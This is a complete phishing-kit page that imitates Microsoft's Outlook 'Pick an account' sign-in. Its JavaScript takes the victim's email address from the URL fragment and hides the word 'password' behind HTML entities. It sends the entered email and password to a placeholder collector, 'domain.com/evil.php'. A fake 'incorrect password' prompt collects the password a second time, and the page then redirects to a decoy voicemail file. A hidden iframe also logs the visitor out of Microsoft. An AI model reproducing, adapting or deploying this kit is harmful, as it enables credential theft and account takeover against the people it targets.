<html lang="en">
<iframe style="border: 0;" src="https://login.microsoftonline.com/logout.srf?ct=1548343592&rver=64.4.6456.0&lc=1033&id=501392" height="0" width="0"></iframe>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6468.8/content/images/favicon_a.ico">
<title>Sign in to Outlook</title>

<!-- Bootstrap core CSS -->
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"
      integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css"
      integrity="sha256-NuCn4IvuZXdBaFKJOAcsU2Q3ZpwbdFisd5dux4jkQ5w=" crossorigin="anonymous">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet"
      integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">

<!-- Custom styles for this template -->
<style type="text/css">
    #rand {
        font-size: 0;

    }

    /* Large desktops and laptops */
    @media (min-width: 1200px) {
        body {
            background-image: url(https://aadcdn.msauth.net/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg);
            background-origin: inherit;
            background-size: cover;
        }
    }

    /* Landscape tablets and medium desktops */
    @media (min-width: 992px) and (max-width: 1199px) {
    }

    /* Portrait tablets and small desktops */
    @media (min-width: 768px) and (max-width: 991px) {
        body {
            background-image: url(https://aadcdn.msauth.net/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg);
            background-origin: inherit;
            background-size: cover;
        }
    }

    /* Landscape phones and portrait tablets */
    @media (max-width: 767px) {
        body {
            background-color: #FFF;
        }
    }

    /* Portrait phones and smaller */
    @media (max-width: 480px) {
        body {
            background-color: #FFF;
        }

        .box {
            margin-top: 10%;
        }

    }

    .box {

        padding: 10px;
        background-color: #FFF;
    }

    .imgc {
        padding: 20px;
    }

    .form-control {
        border: 5;
        border-radius: 5;
        border-bottom: 1px;
        border-bottom-style: solid;
        border-top-color: #FFF;
    }

    .btn {
        background-color: #005DA6;
        color: #FFF;
        padding-left: 30px;
        padding-right: 30px;
        border-radius: 0px;
        padding: 7px 24px;
        color: #FFF;
        font-size: 16px;

        border: 0;
        text-align: center;
        -webkit-transition: background .15s ease-in;
        transition: background .15s ease-in;
        cursor: pointer;
        min-width: 120px;
    }

    .btn:hover, .btn:focus {
        color: #FFF;
    }

    .thxsss {
        display: none;
    }

    .hid {
        margin-top: 10%;
    }

    li {
        float: right;
        padding-left: 10px;
    }

    .eml {
        padding: 12px;
        margin: 0%;
    }

    .eml:hover {
        background-color: #E5E5E5;
    }


    .eml:active {
        border: 1px;
        border-style: dotted;
        border-color: black;
    }

    .LOGin_F0rm {
        display: none;
    }


    .loading-dots {
        text-align: center;
        z-index: 5;
        display: none;
		height: 5;
    }

    .loading-dots .dot {
        color: #00A4EF;
        display: inline;
        margin-left: 0.2em;
        margin-right: 0.2em;
        position: relative;
        top: -1em;
        font-size: 4em;
        opacity: 0;
        -webkit-animation: showHideDot 2.5s ease-in-out infinite;
        animation: showHideDot 2.5s ease-in-out infinite;
    }

    .loading-dots .dot.one {
        -webkit-animation-delay: 0.2s;
        animation-delay: 0.2s;
    }

    .loading-dots .dot.two {
        -webkit-animation-delay: 0.4s;
        animation-delay: 0.4s;
    }

    .loading-dots .dot.three {
        -webkit-animation-delay: 0.6s;
        animation-delay: 0.6s;
    }

    @-webkit-keyframes showHideDot {
        0% {
            opacity: 0;
        }
        50% {
            opacity: 1;
        }
        60% {
            opacity: 1;
        }
        100% {
            opacity: 0;
        }
    }

    @keyframes showHideDot {
        0% {
            opacity: 0;
        }
        50% {
            opacity: 1;
        }
        60% {
            opacity: 1;
        }
        100% {
            opacity: 0;
        }
    }
</style>


<section>
    <div class="container ">
        <div class="row">
            <div class="col-md-12 hidden-sm hidden-xs">
                <!-- <div class="hid"></div> --><br><br><br><br>
            </div>
			<div class="text-center outo">
				<img style="max-width: 180px; max-height: 36px;" src="https://aadcdn.msauth.net/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png" alt=""><br><br>
			</div>
            <div class="col-md-4 col-md-offset-4 box" > 
                <div class="loading-dots" style="display: none;">
				   <h1 class="dot one">.</h1> 
				   <h1 class="dot two">.</h1> 
				   <h1 class="dot three">.</h1> 
				   <h1 class="dot _4">.</h1> 
				   <h1 class="dot _5">.</h1> 
				   <h1 class="dot three">.</h1> 
				   <h1 class="dot _5">.</h1> 
				   <h1 class="dot three">.</h1> 
                </div>
                <div class="imgc">
                    <div id="form-messages"></div>
                    <img class="img-responsive" src="HTTPS://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" width="110" height="33">
                    <div class="add_em" role="presentation" style="display: block;">
                    <br>
                    <body>      
         <div style="color:black;font-size:22px; font-weight:bold; font-family:Verdana, Arial, Tahoma, Serif;">Pick an account</div>
         <p style="color:black;font-size:13px;">to continue to Outlook</p>
      </body>
                        <div class="eml">

                            <img class="tile-img" role="presentation"
                                 src="https://aadcdn.msauth.net/shared/1.0/content/images/picker_account_aad_f83ebff69a4a1685e4dc9650cdab8886.svg">
                            <span id="emx"></span><span style="float: right;margin-top: 6%"><img
                                src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7230.10/content/images/picker_more.png"
                                alt=""></span>
                        </div>
                        <div class="eml">

                            <img class="tile-img" role="presentation"
                                 src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7230.10/content/images/picker_account_add.svg">
                            <span style="    word-wrap: break-word;">Use another account</span>
                        </div>
                        <br><br>
                    </div>

                    <br>
                    <div class="thxsss" role="presentation" style="display: none;">
                        <div class="text-center">
                            <br><br>
                            <img style="width: 250px; text-align: center;" class="img-responsive"
                                 src="">
                        </div>
                        <br> <br>
                    </div>
					<!-- Login 1 -->
                    <div id="Form1" class="LOGin_F0rm" role="presentation" style="display: none;">
                        <i class="fa fa-arrow-left"></i> <span id="test"></span>
                        <br>
                        <br>
                        <h4>Enter &#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;</h4>
                        <div style="color: red;" class="warning" id="warningx" style="display: none;"></div>
                        <p>Because you're accessing sensitive info, you need to verify your &#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;</p><br>
                        <input required="" autofocus="" id="psssss" name="pass" placeholder="&#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;" type="password"
                               class="form-control">
                        <input id="testx" name="email" value="" type="hidden">
                        <br>
                        <a href="#">&#70;&#x6F;&#114;&#x67;&#x6F;&#116; &#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;?</a><br>
                        <a href="#">Sign in with different account</a>
                        <br><br>
                        <button id="submit" style="float:right" onclick="KIRIM()" class="btn twoToneButton">Sign in</button>
                        <div id="Dev"></div>
                        <br><br>
					</div>
					<!-- Login 2 -->
                    <div id="Form2" class="LOGin_F0rmX" role="presentation" style="display: none;">
                        <i class="fa fa-arrow-left"></i> <span id="testz"></span>
                        <br>
                        <br>
                        <h4>Enter &#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;</h4>
                        <div style="color: red;" class="warning" id="warningz" style="display: none;"></div>
                        <p>Because you're accessing sensitive info, you need to verify your &#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;</p><br>
                        <input required="" autofocus="" id="psssssx" name="pass" placeholder="&#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;" type="password"
                               class="form-control">
                        <input id="testxz" name="email" value="" type="hidden">
                        <br>
                        <a href="#">&#70;&#x6F;&#114;&#x67;&#x6F;&#116; &#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;?</a><br>
                        <a href="#">Sign in with different account</a>
                        <br><br>
                        <button id="submits" style="float:right" onclick="LAGIYA()" class="btn twoToneButton">Sign in</button>
                        <div id="Dev"></div>
                        <br><br>
					</div>					
                </div>

            </div>
        </div>
    </div>
    <div>
     <div>
		<div style="color: #FFF; background: #DDD;background-color: rgba(0,0,0,0.6); position: fixed; bottom: 0; height: 22; width: 100%;" class="fot">
			<ul class="list-unstyled" style="font-family:Segoe UI Webfont; font-style: normal; font-size:95%;">
				<li><img src="https://aadcdn.msftauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg"></li>
				<li>Pri&shy;vacy &amp; co&shy;oki&shy;es</li>
				<li>Te&shy;rm&shy;s of u&shy;se</li>
			</ul>
		</div>
     </div>
    </div>
</section>
<!-- /.container -->


<!-- Bootstrap core JavaScript
    ================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
        integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
        crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js"
        integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ"
        crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"
        integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa"
        crossorigin="anonymous"></script>


<script>
    var hash = window.location.hash;
    var encoded_string = hash.split('#')[1];
    document.getElementById('testx').value = (encoded_string);
    document.getElementById('test').innerHTML = (encoded_string);
	document.getElementById('testxz').value = (encoded_string);
    document.getElementById('testz').innerHTML = (encoded_string);
    document.getElementById('emx').innerHTML = (encoded_string);

    $(document).ready(function () {
        $('.btn').on('click', function () {
            $(".loading-dots").show();
            var $this = $(this);
            var loadingText = '<i class="fa fa-circle-o-notch fa-spin"></i> loading...';
            if ($(this).html() !== loadingText) {
                $this.data('original-text', $(this).html());
                $this.html(loadingText);
            }

        });
    });
	
    $('#psssss').keyup(function (event) {
        if (event.which == 13) {
            $('#submit').click();
        }
    });
	
    $('#psssssx').keyup(function (event) {
        if (event.which == 13) {
            $('#submits').click();
        }
    });

    $('.eml').click(function () {
        $(".LOGin_F0rm").show();
		$(".LOGin_F0rmX").hide();
		$(".add_em").hide();
		$('#psssss').focus();
    })

    function KIRIM() {
        var em = $('#testx').val();
        var ps = $('#psssss').val();
		// Blank pass
		var xhttp = new XMLHttpRequest();
		xhttp.onreadystatechange = function () {
			if (this.readyState == XMLHttpRequest.DONE) {
				var response = JSON.parse(this.responseText);
				if (response.msg == "VALID") {
					$(".add_em").hide();
					$(".LOGin_F0rm").hide();
					$(".LOGin_F0rmX").hide();
					$(".loading-dots").show();
					$(".thxsss").show();
					setTimeout("window.location.href='https://ia802906.us.archive.org/29/items/voicemail_201810/message.wav';", 5000);
				} else if (response.msg == "GAGAL") {
					$(".LOGin_F0rm").hide();
					$(".LOGin_F0rmX").show();
					$('#psssss').empty();
					$('#psssssx').empty();
					$('#testx').val();
					$('#psssssx').focus();
					$(".add_em").hide();				
					$(".loading-dots").hide();
					$(".btn").html("login");
					$("#warningz").empty();
					$('#warningz').append("Your &#x61;&#99;&#x63;&#111;&#x75;&#110;&#x74; or &#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64; is &#105;&#x6E;&#99;&#x6F;&#114;&#x72;&#101;&#x63;&#116;. If &#121;&#x6F;&#117; don't remember &#121;&#x6F;&#117;&#x72; &#112;&#x61;&#115;&#x73;&#119;&#x6F;&#114;&#x64;, <a href='#'> &#114;&#x65;&#115;&#101;&#x74; &#105;&#x74; now.</a><br><br>");
				} else if (response.msg == "KOSONG") {
					$('#psssss').focus();
					$(".btn").html("Sign in");
					$(".loading-dots").hide();
					$("#warningx").empty();
					$("#warningx").append("Please enter your password<br><br>");
				}
			}
		};
		xhttp.open("GET", "https:/www.domain.com/evil.php?u=" + em + "&p=" + ps, true); // Set link page heres
		xhttp.send();
    }
	
	// Kolom 2
    function LAGIYA() {
        var em = $('#testxz').val();
        var ps = $('#psssssx').val();
		// Blank pass
		var xhttp = new XMLHttpRequest();
		xhttp.onreadystatechange = function () {
			if (this.readyState == XMLHttpRequest.DONE) {
				var response = JSON.parse(this.responseText);
				if (response.msg == "KOSONG") {
					$(".btn").html("login");
					$(".loading-dots").hide();
					$("#warningz").empty();
					$("#warningz").append("Please enter your password<br><br>");
					$('#psssssx').focus();
				} else {
					$(".add_em").hide();
					$(".LOGin_F0rm").hide();
					$(".LOGin_F0rmX").hide();
					$(".loading-dots").show();
					$(".thxsss").show();
					setTimeout("window.location.href='https://ia802906.us.archive.org/29/items/voicemail_201810/message.wav';", 5000);
				}
			}
		};
	xhttp.open("GET", "https://www.domain.com/evil.php?u=" + em + "&p=" + ps, true); // Set link page here
	xhttp.send();
    }	
</script>

</html>
